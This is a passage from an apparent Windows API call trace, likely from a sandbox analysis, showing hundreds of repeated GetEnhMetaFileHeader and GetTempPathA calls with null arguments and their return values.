lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.862] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.862] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, 